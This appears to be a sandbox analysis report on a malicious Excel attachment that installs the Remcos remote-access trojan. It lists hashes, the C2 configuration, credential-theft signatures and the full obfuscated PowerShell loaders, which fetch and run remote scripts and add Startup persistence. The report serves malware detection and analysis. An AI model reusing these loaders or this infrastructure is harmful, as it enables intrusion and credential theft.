Analysis
-
max time kernel
209s -
max time network
207s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
16-08-2022 20:38
Behavioral task
behavioral1
Sample
Remittance_Advice_BofA.xls
Resource
win7-20220812-en
General
-
Target
Remittance_Advice_BofA.xls
-
Size
129KB
-
MD5
ef647821a5b83276209b316934bad8ab
-
SHA1
1e01b86c162aad282434c34d13147dd404e8d59a
-
SHA256
adbbd78d5c79c11d3e5f723085b3d5d3fb2a34047a3e2a8791cdd764b78b08f7
-
SHA512
a2d6cb284376ac52fbeaf895b85e7924b17248b4af8b057c5c24990430963aa0a04a427a3aa2634e4d8594579c23411afa5bbc446933f2fee2bf65dd60e4f55c
Malware Config
Extracted
remcos
Aug
topboysully.dvrlists.com:10171
-
audio_folder
MicRecords
-
audio_path
%AppData%
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
install_path
%AppData%
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
keylog_path
%AppData%
-
mouse_option
false
-
mutex
Aug-MR3KZU
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
startup_value
Remcos
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
WScript.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 5064 1280 WScript.exe EXCEL.EXE -
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
Processes:
resource yara_rule behavioral2/memory/1048-169-0x0000000000400000-0x0000000000457000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
Processes:
resource yara_rule behavioral2/memory/4600-171-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Nirsoft 3 IoCs
Processes:
resource yara_rule behavioral2/memory/1048-169-0x0000000000400000-0x0000000000457000-memory.dmp Nirsoft behavioral2/memory/4956-170-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft behavioral2/memory/4600-171-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exepowershell.exeflow pid process 17 1708 powershell.exe 31 5040 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exeWScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation WScript.exe -
Loads dropped DLL 1 IoCs
Processes:
powershell.exepid process 5040 powershell.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
Processes:
RegAsm.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts RegAsm.exe -
Suspicious use of SetThreadContext 4 IoCs
Processes:
powershell.exeRegAsm.exedescription pid process target process PID 5040 set thread context of 3172 5040 powershell.exe RegAsm.exe PID 3172 set thread context of 4600 3172 RegAsm.exe RegAsm.exe PID 3172 set thread context of 1048 3172 RegAsm.exe RegAsm.exe PID 3172 set thread context of 4956 3172 RegAsm.exe RegAsm.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE -
Processes:
iexplore.exeIEXPLORE.EXEdescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\MINIE iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30978497" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000883ed98174fc174d8e18111dae0d9120000000000200000000001066000000010000200000004dd2d878eb698d3b9c9c77e30e7477db5f74b56aef834946d413ebfd1a78c855000000000e8000000002000020000000fad1a6bc03a2e035a563dc8a45859bad84694fa6888eae2e3ed40b92d57d446720000000f9754f968c2bfa7fa8bbe003c3fd5b8beb09546afc9ffe62ad3a3e91fd65c5a2400000009e87965ddfb6e6816b170dead8573d87441cb7a1031117098c29d8f7a0e0868f1a9dee21b11038daa508621dc83e5604dba7f93a5a73cf781685a599fab7c6cf iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{3E8BEAAD-1DB4-11ED-AECB-F639923F7CA1} = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "321442629" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 308b0817c1b1d801 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\IESettingSync IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 8020e716c1b1d801 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\VersionManager iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "321442629" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30978497" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000883ed98174fc174d8e18111dae0d912000000000020000000000106600000001000020000000567306e053dd6293174bf7f5f7854d6ad765da99d67bda39b084d2c25f858325000000000e80000000020000200000005c6d61a9da629ef99ac7f57614d36be5a454331fa344769219e74c56435c514220000000b417820a0123e97f29d5b8ced1bdc6f0a1779fdd6b8fb4ad0fc1f354ac995c2540000000024990a463b183fea635256dc38c9eeee6dcfa90b17131808e0a6c660931466ac0c968eb3d90d976988b31cff5375bec3d5c022beb634080c85753ec5063bbc2 iexplore.exe -
Modifies registry class 3 IoCs
Processes:
EXCEL.EXEpowershell.exedescription ioc process Set value (data) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots EXCEL.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings powershell.exe -
NTFS ADS 1 IoCs
Processes:
EXCEL.EXEdescription ioc process File opened for modification C:\Users\Admin\AppData\Local\Temp\{4B675147-A5B1-4AC4-87BE-6B9CF8F18624}\rkWwH.txt:Zone.Identifier EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 1280 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 12 IoCs
Processes:
powershell.exepowershell.exepowershell.exeRegAsm.exeRegAsm.exepid process 1708 powershell.exe 1708 powershell.exe 5040 powershell.exe 4868 powershell.exe 5040 powershell.exe 4868 powershell.exe 4600 RegAsm.exe 4600 RegAsm.exe 4956 RegAsm.exe 4956 RegAsm.exe 4600 RegAsm.exe 4600 RegAsm.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
Processes:
RegAsm.exepid process 3172 RegAsm.exe 3172 RegAsm.exe 3172 RegAsm.exe -
Suspicious use of AdjustPrivilegeToken 46 IoCs
Processes:
powershell.exepowershell.exepowershell.exeRegAsm.exedescription pid process Token: SeDebugPrivilege 1708 powershell.exe Token: SeDebugPrivilege 5040 powershell.exe Token: SeDebugPrivilege 4868 powershell.exe Token: SeIncreaseQuotaPrivilege 5040 powershell.exe Token: SeSecurityPrivilege 5040 powershell.exe Token: SeTakeOwnershipPrivilege 5040 powershell.exe Token: SeLoadDriverPrivilege 5040 powershell.exe Token: SeSystemProfilePrivilege 5040 powershell.exe Token: SeSystemtimePrivilege 5040 powershell.exe Token: SeProfSingleProcessPrivilege 5040 powershell.exe Token: SeIncBasePriorityPrivilege 5040 powershell.exe Token: SeCreatePagefilePrivilege 5040 powershell.exe Token: SeBackupPrivilege 5040 powershell.exe Token: SeRestorePrivilege 5040 powershell.exe Token: SeShutdownPrivilege 5040 powershell.exe Token: SeDebugPrivilege 5040 powershell.exe Token: SeSystemEnvironmentPrivilege 5040 powershell.exe Token: SeRemoteShutdownPrivilege 5040 powershell.exe Token: SeUndockPrivilege 5040 powershell.exe Token: SeManageVolumePrivilege 5040 powershell.exe Token: 33 5040 powershell.exe Token: 34 5040 powershell.exe Token: 35 5040 powershell.exe Token: 36 5040 powershell.exe Token: SeIncreaseQuotaPrivilege 5040 powershell.exe Token: SeSecurityPrivilege 5040 powershell.exe Token: SeTakeOwnershipPrivilege 5040 powershell.exe Token: SeLoadDriverPrivilege 5040 powershell.exe Token: SeSystemProfilePrivilege 5040 powershell.exe Token: SeSystemtimePrivilege 5040 powershell.exe Token: SeProfSingleProcessPrivilege 5040 powershell.exe Token: SeIncBasePriorityPrivilege 5040 powershell.exe Token: SeCreatePagefilePrivilege 5040 powershell.exe Token: SeBackupPrivilege 5040 powershell.exe Token: SeRestorePrivilege 5040 powershell.exe Token: SeShutdownPrivilege 5040 powershell.exe Token: SeDebugPrivilege 5040 powershell.exe Token: SeSystemEnvironmentPrivilege 5040 powershell.exe Token: SeRemoteShutdownPrivilege 5040 powershell.exe Token: SeUndockPrivilege 5040 powershell.exe Token: SeManageVolumePrivilege 5040 powershell.exe Token: 33 5040 powershell.exe Token: 34 5040 powershell.exe Token: 35 5040 powershell.exe Token: 36 5040 powershell.exe Token: SeDebugPrivilege 4956 RegAsm.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
iexplore.exepid process 5092 iexplore.exe -
Suspicious use of SetWindowsHookEx 17 IoCs
Processes:
EXCEL.EXEiexplore.exeIEXPLORE.EXEpid process 1280 EXCEL.EXE 1280 EXCEL.EXE 1280 EXCEL.EXE 1280 EXCEL.EXE 1280 EXCEL.EXE 1280 EXCEL.EXE 1280 EXCEL.EXE 1280 EXCEL.EXE 1280 EXCEL.EXE 1280 EXCEL.EXE 1280 EXCEL.EXE 1280 EXCEL.EXE 1280 EXCEL.EXE 5092 iexplore.exe 5092 iexplore.exe 4084 IEXPLORE.EXE 4084 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 37 IoCs
Processes:
EXCEL.EXEWScript.exepowershell.exeiexplore.exeWScript.exepowershell.exeRegAsm.exedescription pid process target process PID 1280 wrote to memory of 5064 1280 EXCEL.EXE WScript.exe PID 1280 wrote to memory of 5064 1280 EXCEL.EXE WScript.exe PID 5064 wrote to memory of 1708 5064 WScript.exe powershell.exe PID 5064 wrote to memory of 1708 5064 WScript.exe powershell.exe PID 1708 wrote to memory of 4696 1708 powershell.exe WScript.exe PID 1708 wrote to memory of 4696 1708 powershell.exe WScript.exe PID 5092 wrote to memory of 4084 5092 iexplore.exe IEXPLORE.EXE PID 5092 wrote to memory of 4084 5092 iexplore.exe IEXPLORE.EXE PID 5092 wrote to memory of 4084 5092 iexplore.exe IEXPLORE.EXE PID 4696 wrote to memory of 5040 4696 WScript.exe powershell.exe PID 4696 wrote to memory of 5040 4696 WScript.exe powershell.exe PID 4696 wrote to memory of 4868 4696 WScript.exe powershell.exe PID 4696 wrote to memory of 4868 4696 WScript.exe powershell.exe PID 5040 wrote to memory of 3172 5040 powershell.exe RegAsm.exe PID 5040 wrote to memory of 3172 5040 powershell.exe RegAsm.exe PID 5040 wrote to memory of 3172 5040 powershell.exe RegAsm.exe PID 5040 wrote to memory of 3172 5040 powershell.exe RegAsm.exe PID 5040 wrote to memory of 3172 5040 powershell.exe RegAsm.exe PID 5040 wrote to memory of 3172 5040 powershell.exe RegAsm.exe PID 5040 wrote to memory of 3172 5040 powershell.exe RegAsm.exe PID 5040 wrote to memory of 3172 5040 powershell.exe RegAsm.exe PID 5040 wrote to memory of 3172 5040 powershell.exe RegAsm.exe PID 5040 wrote to memory of 3172 5040 powershell.exe RegAsm.exe PID 5040 wrote to memory of 3172 5040 powershell.exe RegAsm.exe PID 5040 wrote to memory of 3172 5040 powershell.exe RegAsm.exe PID 3172 wrote to memory of 4600 3172 RegAsm.exe RegAsm.exe PID 3172 wrote to memory of 4600 3172 RegAsm.exe RegAsm.exe PID 3172 wrote to memory of 4600 3172 RegAsm.exe RegAsm.exe PID 3172 wrote to memory of 4600 3172 RegAsm.exe RegAsm.exe PID 3172 wrote to memory of 1048 3172 RegAsm.exe RegAsm.exe PID 3172 wrote to memory of 1048 3172 RegAsm.exe RegAsm.exe PID 3172 wrote to memory of 1048 3172 RegAsm.exe RegAsm.exe PID 3172 wrote to memory of 1048 3172 RegAsm.exe RegAsm.exe PID 3172 wrote to memory of 4956 3172 RegAsm.exe RegAsm.exe PID 3172 wrote to memory of 4956 3172 RegAsm.exe RegAsm.exe PID 3172 wrote to memory of 4956 3172 RegAsm.exe RegAsm.exe PID 3172 wrote to memory of 4956 3172 RegAsm.exe RegAsm.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Remittance_Advice_BofA.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\rkWwH.js"2⤵
- Process spawned unexpected child process
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference = 'SilentlyContinue' ;$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.ew\''+pmet:vne$,''sbv.enixam/31.02.721.902//:ptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX($TC|% {-join($_[-1..-$_.Length])});start-process($env:temp+ '\we.vbs');remove-item ($env:appdata + '\rkWwH.js')3⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\we.vbs"4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $gf=(00100100,01000101,01110010,01110010,01101111,01110010,01000001,01100011,01110100,01101001,01101111,01101110,01010000,01110010,01100101,01100110,01100101,01110010,01100101,01101110,01100011,01100101,00100000,00111101,00100000,00100111,01010011,01101001,01101100,01100101,01101110,01110100,01101100,01111001,01000011,01101111,01101110,01110100,01101001,01101110,01110101,01100101,00100111,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,01000001,01100100,01100100,00101101,01010100,01111001,01110000,01100101,00100000,00101101,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,01001110,01100001,01101101,01100101,00100000,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,01010000,00101000,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,01100101,00100111,00101011,00100111,01110100,00101110,01010111,01100101,00100111,00101011,00100111,01100010,01000011,01101100,01101001,00100111,00101011,00100111,01100101,01101110,01110100,00101001,00100111,00101001,00111011,00100100,01101101,01110110,00111101,00100000,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01001001,01101110,01110100,01100101,01110010,01100001,01100011,01110100,01101001,01101111,01101110,01011101,00111010,00111010,01000011,01100001,01101100,01101100,01000010,01111001,01101110,01100001,01101101,01100101,00101000,00100100,01110100,01110100,01111001,00101100,00100111,01000100,01101111,01110111,01101110,00100111,00100000,00101011,00100000,00100111,01101100,01101111,01100001,01100100,00100111,00100000,00101011,00100000,00100111,01010011,01110100,01110010,00100111,00100000,00101011,00100000,00100111,01101001,01101110,01100111,00100111,00101100,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01000011,01100001,01101100,01101100,01010100,01111001,01110000,01100101,01011101,00111010,00111010,01001101,01100101,01110100,01101000,01101111,01100100,00101100,00100111,01101000,01110100,01110100,01110000,00100111,00100000,00101011,00100000,00100111,00111010,00101111,00101111,00110010,00110000,00111001,00101110,00110001,00110010,00110111,00101110,00110010,00110000,00101110,00110001,00110011,00101111,01101101,01100001,01111000,00101110,01101010,01110000,01100111,00100111,00101001,01111100,01010000) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };$o00='ZE000'.replace('Z','I').replace('000','x');sal P $o00;([system.String]::Join('', $gf))|P5⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\xrdxquuntc"7⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\zljqrmfhhleca"7⤵
- Accesses Microsoft Outlook accounts
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\knwajeqivtwhclzwf"7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Move-item 'C:\Users\Admin\AppData\Local\Temp\we.vbs' -Destination 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\we.vbs'5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Internet Explorer\ielowutil.exe"C:\Program Files (x86)\Internet Explorer\ielowutil.exe" -CLSID:{0002DF01-0000-0000-C000-000000000046} -Embedding1⤵
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5092 CREDAT:17410 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5556084f2c6d459c116a69d6fedcc4105
SHA1633e89b9a1e77942d822d14de6708430a3944dbc
SHA25688cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA5120f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
-
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\z2evvp3\imagestore.datFilesize
30KB
MD5d9d0543f39ef0a7b9ad04402b1ab8bcc
SHA1fa5b074f4bf4a3bc2763da85f85def62d2709e1b
SHA256d48719250efd24778cc15f7c96972f1cd9a7f57e3a4f1d0cb1a04c016160e9cd
SHA512b13ad5db6666a8317a75b5de6088b071f190ace89c1cb3e539ffa07e92dc887dbe7927a22f17cefeed29383f61233bd0ae48a82446911895f745a3834d1d0f4f
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD52247453c28acd1eb75cfe181540458a8
SHA1851fc5a9950d422d76163fdc6a453d6859d56660
SHA256358b8df2d92a70274c5ec8e50bf6353c37a7fe1855fd9659f610f8a96eac19bd
SHA51242475e640ee70ab4bd7350dbd970c5862f1597918b6a5e3ee038a10a5c5b883ac61038ecec51a7bfe7cb615798d832fae4a3ead9571f35825a644dee1f2dd7d3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5a854d979ef8da9302b9bd0c4d98ed8bd
SHA1bf6ab378ca14e07095d701b757d7e88ebae2f944
SHA256e93b4e8f3f4bdee8d5bbfcfa79f12e90d5cdc060859ce9326bb40db2c9c34a8e
SHA512c6961f80db242ece9fa69761d5dfa5c8bd3194857d11d2f8300fdbb7cb9b6ff0765d2e4de715b6a31492e5a04f80619113c6e63cef747e802888c83cd9019caf
-
C:\Users\Admin\AppData\Local\Temp\0b11dad3-e15c-4937-b805-b2895dc6b4e7\AgileDotNetRT64.dllFilesize
75KB
MD542b2c266e49a3acd346b91e3b0e638c0
SHA12bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1
SHA256adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29
SHA512770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81
-
C:\Users\Admin\AppData\Local\Temp\we.vbsFilesize
2KB
MD5b53758dd50ce606eaa76ab0c58ae4b34
SHA16e7b58e1b6211b2985de1b025bb98a4ec1bfc733
